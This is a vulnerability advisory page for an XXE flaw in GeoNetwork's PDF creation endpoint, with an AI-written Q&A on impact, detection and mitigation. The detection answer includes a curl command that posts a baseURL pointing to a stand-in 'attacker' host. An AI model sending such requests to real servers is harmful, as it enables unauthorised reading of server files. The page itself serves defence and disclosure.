CVE-2022-50899
XXE Vulnerability in Geonetwork PDF Rendering Allows File Disclosure
Publication date: 2026-01-13
Last updated on: 2026-02-27
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| osgeo | geonetwork | From 3.10.0 (inc) to 4.2.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2022-50899 is an XML External Entity (XXE) vulnerability in GeoNetwork versions 3.10 through 4.2.0. It occurs during the PDF rendering process when the application processes XML input without securely configuring the XML parser. Attackers can craft malicious XML documents containing external entity references and submit them via the baseURL parameter in PDF creation requests. This allows them to retrieve arbitrary files from the server by exploiting the insecure XML parser, potentially reading sensitive system files. [1, 2]
How can this vulnerability impact me? :
This vulnerability can allow attackers to retrieve arbitrary files from the server hosting GeoNetwork, potentially exposing sensitive information such as system files. Since the attack requires no privileges or user interaction and can be performed remotely over the network, it poses a significant confidentiality risk. The attacker can exfiltrate sensitive data, which could lead to further exploitation or compromise of the affected system. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST requests to the endpoint `/geonetwork/pdf/create.json` that include a JSON payload with a `baseURL` parameter pointing to an external XML file. You can use network monitoring tools or web server logs to identify such requests. For example, using curl to simulate or detect such requests: `curl -X POST -H "Content-Type: application/json" -d '{"baseURL":"http://attacker/xxe.xml"}' http://your-geonetwork-server/geonetwork/pdf/create.json`. Additionally, inspecting logs for unusual external URL references in the `baseURL` parameter or unexpected XML processing errors may help detect exploitation attempts. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or disabling external entity processing in the XML parser used by GeoNetwork during PDF rendering. If possible, update GeoNetwork to a version later than 4.2.0 where this vulnerability is fixed. Additionally, implement network-level controls to block outgoing requests to untrusted external URLs from the GeoNetwork server, especially those targeting the PDF creation endpoint. Monitoring and filtering incoming requests to ensure the `baseURL` parameter does not reference untrusted external resources can also reduce risk. [1, 2]